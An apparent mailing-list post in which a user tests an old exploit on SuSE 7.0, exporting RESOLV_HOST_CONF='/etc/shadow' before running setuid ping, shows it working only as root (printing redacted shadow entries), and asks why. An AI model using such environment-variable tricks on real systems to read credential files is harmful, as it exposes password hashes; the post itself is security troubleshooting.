I tried the exploit on a SuSE 7.0 host. If root starts ping/traceroute..., the /etc/shadow file is being shown; if a normal user exports RESOLV_HOST_CONF, nothing abnormal happens:

[EMAIL PROTECTED]:~ > ls -l /bin/ping
-rwsr-xr-x 1 root root 23k Okt 4 12:37 /bin/ping
[EMAIL PROTECTED]:~ > ldd /bin/ping
        libc.so.6 => /lib/libc.so.6 (0x40021000)
        /lib/ld-linux.so.2 => /lib/ld-linux.so.2 (0x40000000)
[EMAIL PROTECTED]:~ > export RESOLV_HOST_CONF='/etc/shadow'
[EMAIL PROTECTED]:~ > ping localhost
PING localhost (127.0.0.1): 56 data bytes
64 bytes from 127.0.0.1: icmp_seq=0 ttl=255 time=0.189 ms
<-snip->
[EMAIL PROTECTED]:~ >

spock:~ # export RESOLV_HOST_CONF='/etc/shadow'
spock:~ # ping localhost
/etc/shadow: line 1: bad command `root:blabla:9473:0:10000::::'
<-snip->
/etc/shadow: line 47: bad command `bj:blabla:11194:0:99999:7:0::'
PING localhost (127.0.0.1): 56 data bytes
64 bytes from 127.0.0.1: icmp_seq=0 ttl=255 time=0.191 ms
<-snip->
spock:~ #

Any idea why? Does the variable not apply for normal users?

Björn